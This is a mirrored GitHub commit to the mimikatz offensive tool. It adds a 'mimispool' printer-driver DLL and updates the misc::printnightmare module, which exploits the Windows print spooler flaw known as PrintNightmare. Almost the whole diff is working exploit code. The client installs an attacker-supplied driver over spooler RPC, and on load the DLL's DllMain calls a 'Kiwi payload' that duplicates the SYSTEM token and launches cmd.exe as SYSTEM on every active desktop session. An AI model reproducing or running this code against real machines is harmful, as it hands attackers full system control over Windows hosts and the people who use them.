mirror of
https://github.com/gentilkiwi/mimikatz
synced 2024-12-17 19:54:41 +00:00
[new] mimispool module to support PrintNightmare 2.x and 4.x
[new] mimispool module now try to pop SYSTEM cmd on all active desktops [new] mimikatz misc::printnightmare try to clean temporary printer driver (not available by default on remote ones)
This commit is contained in:
Benjamin DELPY
parent
2a5b839224
commit
247da32854
@ -1658,7 +1658,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
DriverInfo.pEnvironment = bIsX64 ? L"Windows x64" : L"Windows NT x86";
|
||||
if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
|
||||
{
|
||||
if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pConfigFile, NULL))
|
||||
if(kuhl_m_misc_printnightmare_normalize_library(bIsPar, szLibrary, &DriverInfo.pConfigFile, NULL))
|
||||
{
|
||||
szForce = kull_m_string_args_byName(argc, argv, L"useown", NULL, NULL) ? DriverInfo.pConfigFile : NULL;
|
||||
|
||||
@ -1669,7 +1669,13 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
{
|
||||
if(kuhl_m_misc_printnightmare_FillStructure(&DriverInfo, bIsX64, !kull_m_string_args_byName(argc, argv, L"nodynamic", NULL, NULL), szForce, bIsPar, hSpoolHandle))
|
||||
{
|
||||
kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER);
|
||||
if(kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER))
|
||||
{
|
||||
if(!bIsPar) // we can't remotely with normal user, use /clean with > rights
|
||||
{
|
||||
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hSpoolHandle, DriverInfo.pEnvironment, DriverInfo.pName);
|
||||
}
|
||||
}
|
||||
|
||||
LocalFree(DriverInfo.pDataFile);
|
||||
LocalFree(DriverInfo.pDriverPath);
|
||||
@ -1693,7 +1699,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
LPCWSTR szPtr;
|
||||
@ -1710,7 +1716,14 @@ BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *psz
|
||||
}
|
||||
else
|
||||
{
|
||||
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
|
||||
if(!bIsPar)
|
||||
{
|
||||
status = kull_m_file_getAbsolutePathOf(szLibrary, pszNormalizedLibrary);
|
||||
}
|
||||
else
|
||||
{
|
||||
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
|
||||
}
|
||||
}
|
||||
|
||||
if(status)
|
||||
@ -1811,7 +1824,7 @@ BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64
|
||||
|
||||
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete)
|
||||
{
|
||||
DWORD i, ret, cReturned = 0;
|
||||
DWORD i, cReturned = 0;
|
||||
_PDRIVER_INFO_2 pDriverInfo;
|
||||
PWSTR pName, pConfig;
|
||||
|
||||
@ -1828,28 +1841,7 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
|
||||
{
|
||||
if(pName == wcsstr(pName, MIMIKATZ L"-"))
|
||||
{
|
||||
RpcTryExcept
|
||||
{
|
||||
if(bIsPar)
|
||||
{
|
||||
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
|
||||
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
else
|
||||
{
|
||||
kprintf(L"> RpcDeletePrinterDriverEx: ");
|
||||
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hRemoteBinding, szEnvironment, pName);
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -1858,8 +1850,9 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
|
||||
}
|
||||
}
|
||||
|
||||
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
|
||||
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD ret;
|
||||
DRIVER_CONTAINER container_info;
|
||||
|
||||
@ -1882,6 +1875,7 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
status = TRUE;
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
@ -1889,6 +1883,40 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD ret;
|
||||
|
||||
RpcTryExcept
|
||||
{
|
||||
if(bIsPar)
|
||||
{
|
||||
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
|
||||
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, (wchar_t *) pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
else
|
||||
{
|
||||
kprintf(L"> RpcDeletePrinterDriverEx: ");
|
||||
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, (wchar_t *)pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
status = TRUE;
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned)
|
||||
|
||||
@ -51,10 +51,11 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
|
||||
BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);
|
||||
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete);
|
||||
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
|
||||
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
|
||||
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName);
|
||||
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned);
|
||||
|
||||
BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
|
||||
|
||||
@ -5,48 +5,36 @@
|
||||
*/
|
||||
#include "mimispool.h"
|
||||
|
||||
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
|
||||
{
|
||||
BOOL ret = TRUE;
|
||||
|
||||
switch( ul_reason_for_call )
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-PROCESS_ATTACH");
|
||||
ret = FALSE;
|
||||
// FALSE avoid to keep library in memory (PrintNightmare < 3/4)
|
||||
// TRUE will mimic "real" driver/config -- to use/test with /useown on local (remote is not compatible with GetFileVersionInfo*)
|
||||
break;
|
||||
UNREFERENCED_PARAMETER(hinstDLL);
|
||||
UNREFERENCED_PARAMETER(lpReserved);
|
||||
|
||||
case DLL_THREAD_ATTACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-THREAD_ATTACH");
|
||||
break;
|
||||
if (fdwReason == DLL_PROCESS_ATTACH)
|
||||
{
|
||||
RunProcessForAll(L"cmd.exe");
|
||||
}
|
||||
|
||||
case DLL_THREAD_DETACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-THREAD_DETACH");
|
||||
break;
|
||||
|
||||
case DLL_PROCESS_DETACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-PROCESS_DETACH");
|
||||
break;
|
||||
}
|
||||
|
||||
return ret;
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
|
||||
// PrintNightMare 2.x - via config file and/or "real driver"
|
||||
VOID APIENTRY DrvResetConfigCache()
|
||||
{
|
||||
;
|
||||
}
|
||||
|
||||
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
|
||||
if ( dwMode == DRVQUERY_USERMODE)
|
||||
if (dwMode == DRVQUERY_USERMODE)
|
||||
{
|
||||
*pcbNeeded = sizeof(DWORD);
|
||||
if (pBuffer && (cbBuf >= sizeof(DWORD)))
|
||||
{
|
||||
status = TRUE;
|
||||
*(DWORD *)pBuffer = TRUE;
|
||||
*(DWORD*)pBuffer = TRUE;
|
||||
}
|
||||
SetLastError(ERROR_INSUFFICIENT_BUFFER);
|
||||
}
|
||||
@ -58,13 +46,11 @@ BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbB
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pded)
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
|
||||
if((iEngineVersion < 0x20000) || (cj < 0x10))
|
||||
if ((iEngineVersion < 0x20000) || (cj < 0x10))
|
||||
{
|
||||
SetLastError(ERROR_BAD_DRIVER_LEVEL);
|
||||
}
|
||||
@ -81,50 +67,83 @@ BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pde
|
||||
|
||||
VOID APIENTRY DrvDisableDriver()
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
;
|
||||
}
|
||||
|
||||
VOID APIENTRY DrvResetConfigCache()
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
}
|
||||
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
|
||||
|
||||
void kspool(LPCWSTR szFrom)
|
||||
// PrintNightMare 4.x - via CopyFiles
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
|
||||
{
|
||||
FILE * kspool_logfile;
|
||||
WCHAR Buffer[256 + 1];
|
||||
DWORD cbBuffer = ARRAYSIZE(Buffer);
|
||||
|
||||
#pragma warning(push)
|
||||
#pragma warning(disable:4996)
|
||||
if(kspool_logfile = _wfopen(L"mimispool.log", L"a"))
|
||||
#pragma warning(pop)
|
||||
{
|
||||
klog(kspool_logfile, L"[" PLATFORM L"] [%s] as \'%s\'\n", szFrom, GetUserName(Buffer, &cbBuffer) ? Buffer : L"-");
|
||||
fclose(kspool_logfile);
|
||||
}
|
||||
}
|
||||
|
||||
void klog(FILE * logfile, PCWCHAR format, ...)
|
||||
{
|
||||
if(logfile)
|
||||
{
|
||||
va_list args;
|
||||
va_start(args, format);
|
||||
vfwprintf(logfile, format, args);
|
||||
va_end(args);
|
||||
fflush(logfile);
|
||||
}
|
||||
}
|
||||
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
UNREFERENCED_PARAMETER(pszPrinterName);
|
||||
UNREFERENCED_PARAMETER(pszDirectory);
|
||||
UNREFERENCED_PARAMETER(pSplClientInfo);
|
||||
UNREFERENCED_PARAMETER(dwLevel);
|
||||
UNREFERENCED_PARAMETER(pszSourceDir);
|
||||
UNREFERENCED_PARAMETER(pcchSourceDirSize);
|
||||
UNREFERENCED_PARAMETER(pszTargetDir);
|
||||
UNREFERENCED_PARAMETER(pcchTargetDirSize);
|
||||
UNREFERENCED_PARAMETER(dwFlags);
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
UNREFERENCED_PARAMETER(pszPrinterName);
|
||||
UNREFERENCED_PARAMETER(pszKey);
|
||||
UNREFERENCED_PARAMETER(dwCopyFileEvent);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
// Kiwi payload - SYSTEM on all active desktop(s)
|
||||
BOOL RunProcessForAll(LPWSTR szProcess)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
STARTUPINFO si = { 0 };
|
||||
PROCESS_INFORMATION pi = { 0 };
|
||||
HANDLE hToken, hNewToken;
|
||||
DWORD i, count;
|
||||
LPVOID Environment;
|
||||
PSESSIONIDW sessions;
|
||||
|
||||
si.cb = sizeof(si);
|
||||
si.lpDesktop = L"winsta0\\default";
|
||||
|
||||
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
|
||||
{
|
||||
if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
|
||||
{
|
||||
if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
|
||||
{
|
||||
if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
|
||||
{
|
||||
for (i = 0; i < count; i++)
|
||||
{
|
||||
if (sessions[i].State == State_Active)
|
||||
{
|
||||
if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
|
||||
{
|
||||
if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
|
||||
{
|
||||
CloseHandle(pi.hThread);
|
||||
CloseHandle(pi.hProcess);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if (sessions)
|
||||
{
|
||||
WinStationFreeMemory(sessions);
|
||||
}
|
||||
}
|
||||
DestroyEnvironmentBlock(Environment);
|
||||
}
|
||||
CloseHandle(hNewToken);
|
||||
}
|
||||
CloseHandle(hToken);
|
||||
}
|
||||
|
||||
return status;
|
||||
}
|
||||
@ -1,10 +1,11 @@
|
||||
LIBRARY
|
||||
EXPORTS
|
||||
; PrintNightMare 2.x - via config file and/or "real driver"
|
||||
DrvResetConfigCache
|
||||
DrvQueryDriverInfo
|
||||
DrvEnableDriver
|
||||
DrvDisableDriver
|
||||
|
||||
DrvResetConfigCache
|
||||
|
||||
; PrintNightMare 4.x - via CopyFiles
|
||||
GenerateCopyFilePaths
|
||||
SpoolerCopyFileEvent
|
||||
@ -5,35 +5,75 @@
|
||||
*/
|
||||
#pragma once
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <userenv.h>
|
||||
|
||||
#if defined(_M_X64) || defined(_M_ARM64) // to do, for real one day
|
||||
#define PLATFORM L"x64"
|
||||
#elif defined(_M_IX86)
|
||||
#define PLATFORM L"x86"
|
||||
#endif
|
||||
//__pragma(comment(linker, "/export:DllCanUnloadNow=KyXPUI_orig.DllCanUnloadNow,PRIVATE"))
|
||||
//__pragma(comment(linker, "/export:DllGetClassObject=KyXPUI_orig.DllGetClassObject,PRIVATE"))
|
||||
|
||||
typedef LONG_PTR (APIENTRY *PFN)();
|
||||
#define LOGONID_CURRENT ((ULONG) -1)
|
||||
#define SERVERHANDLE_CURRENT ((HANDLE) NULL)
|
||||
#define MAX_THINWIRECACHE 4
|
||||
#define WINSTATIONNAME_LENGTH 32
|
||||
#define DOMAIN_LENGTH 17
|
||||
#define USERNAME_LENGTH 20
|
||||
typedef WCHAR WINSTATIONNAME[WINSTATIONNAME_LENGTH + 1];
|
||||
|
||||
typedef enum _WINSTATIONSTATECLASS {
|
||||
State_Active = 0,
|
||||
State_Connected = 1,
|
||||
State_ConnectQuery = 2,
|
||||
State_Shadow = 3,
|
||||
State_Disconnected = 4,
|
||||
State_Idle = 5,
|
||||
State_Listen = 6,
|
||||
State_Reset = 7,
|
||||
State_Down = 8,
|
||||
State_Init = 9
|
||||
} WINSTATIONSTATECLASS;
|
||||
|
||||
#pragma warning(push)
|
||||
#pragma warning(disable:4201)
|
||||
typedef struct _SESSIONIDW {
|
||||
union {
|
||||
ULONG SessionId;
|
||||
ULONG LogonId;
|
||||
} DUMMYUNIONNAME;
|
||||
WINSTATIONNAME WinStationName;
|
||||
WINSTATIONSTATECLASS State;
|
||||
} SESSIONIDW, * PSESSIONIDW;
|
||||
#pragma warning(pop)
|
||||
|
||||
BOOLEAN WINAPI WinStationEnumerateW(IN HANDLE hServer, OUT PSESSIONIDW* SessionIds, OUT PULONG Count);
|
||||
BOOLEAN WINAPI WinStationFreeMemory(IN PVOID Buffer);
|
||||
|
||||
typedef LONG_PTR(APIENTRY* PFN)();
|
||||
|
||||
typedef struct _DRVFN {
|
||||
ULONG iFunc;
|
||||
PFN pfn;
|
||||
} DRVFN, *PDRVFN;
|
||||
} DRVFN, * PDRVFN;
|
||||
|
||||
typedef struct tagDRVENABLEDATA {
|
||||
ULONG iDriverVersion;
|
||||
ULONG c;
|
||||
DRVFN *pdrvfn;
|
||||
} DRVENABLEDATA, *PDRVENABLEDATA;
|
||||
DRVFN* pdrvfn;
|
||||
} DRVENABLEDATA, * PDRVENABLEDATA;
|
||||
|
||||
#define DRVQUERY_USERMODE 1
|
||||
|
||||
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, __out_bcount(cbBuf) PVOID pBuffer, DWORD cbBuf, __out_ecount(1) PDWORD pcbNeeded);
|
||||
__control_entrypoint(DeviceDriver) BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, __in_bcount(cj) DRVENABLEDATA *pded);
|
||||
VOID APIENTRY DrvDisableDriver();
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved);
|
||||
|
||||
void kspool(LPCWSTR szFrom);
|
||||
void klog(FILE * logfile, PCWCHAR format, ...);
|
||||
// PrintNightMare 2.x - via config file and/or "real driver"
|
||||
VOID APIENTRY DrvResetConfigCache();
|
||||
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded);
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
|
||||
VOID APIENTRY DrvDisableDriver();
|
||||
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
|
||||
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
|
||||
|
||||
// PrintNightMare 4.x - via CopyFiles
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
|
||||
|
||||
// Kiwi payload - SYSTEM on all active desktop(s)
|
||||
BOOL RunProcessForAll(LPWSTR szProcess);
|
||||
@ -79,7 +79,7 @@
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<AssemblyDebug>false</AssemblyDebug>
|
||||
<AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>userenv.lib;winsta.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<DataExecutionPrevention>true</DataExecutionPrevention>
|
||||
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
|
||||
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
|
||||
|
||||
@ -211,6 +211,4 @@ NET_API_STATUS NET_API_FUNCTION NetWkstaUserEnum(IN LMSTR servername, IN DWORD l
|
||||
NET_API_STATUS NET_API_FUNCTION NetShareEnum(IN LMSTR servername, IN DWORD level, OUT LPBYTE *bufptr, IN DWORD prefmaxlen, OUT LPDWORD entriesread, OUT LPDWORD totalentries, IN OUT LPDWORD resume_handle);
|
||||
NET_API_STATUS NET_API_FUNCTION NetStatisticsGet(IN LPWSTR server, IN LPWSTR service, IN DWORD level, IN DWORD options, OUT LPBYTE *bufptr);
|
||||
NET_API_STATUS NET_API_FUNCTION NetRemoteTOD(IN LPCWSTR UncServerName, OUT PTIME_OF_DAY_INFO *pToD);
|
||||
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
|
||||
NET_API_STATUS NET_API_FUNCTION NetShareAdd(IN LMSTR servername, IN DWORD level, IN LPBYTE buf, OUT LPDWORD parm_err);
|
||||
NET_API_STATUS NET_API_FUNCTION NetConnectionEnum(IN LMSTR servername, LMSTR qualifier, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle);
|
||||
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
|
||||
Loading…
Reference in New Issue
Block a user